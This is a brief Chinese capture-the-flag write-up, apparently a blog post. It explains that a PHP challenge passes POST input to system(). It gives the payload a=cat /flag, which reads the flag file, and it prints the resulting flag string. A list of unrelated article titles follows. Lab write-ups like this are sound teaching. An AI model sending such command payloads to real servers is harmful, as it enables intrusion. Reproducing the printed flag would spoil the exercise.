开启靶场,打开链接:
这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);
system() 函数会通过软连接执行你输入的系统命令
POST传参:a=cat /flag
成功得到flag:
NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}
相关推荐
kp000006 分钟前
PHP弱类型安全漏洞解析与防范指南LaoZhangGong12333 分钟前
W5500使用ioLibrary库创建TCP客户端默心44 分钟前
运维工程师面试经验分享Hello.Reader2 小时前
EDR与XDR如何选择适合您的网络安全解决方案AIGC方案2 小时前
2025 AI如何重构网络安全产品谈不譚网安3 小时前
Cross-Site Scripting(XSS)Q_Q19632884753 小时前
python的漫画网站管理系统Maplesoft5 小时前
精准掌控张力动态,重构卷对卷工艺设计SRC_BLUE_176 小时前
VulnHub | Breach - 1神经毒素14 小时前
WEB安全--Java安全--shiro721反序列化漏洞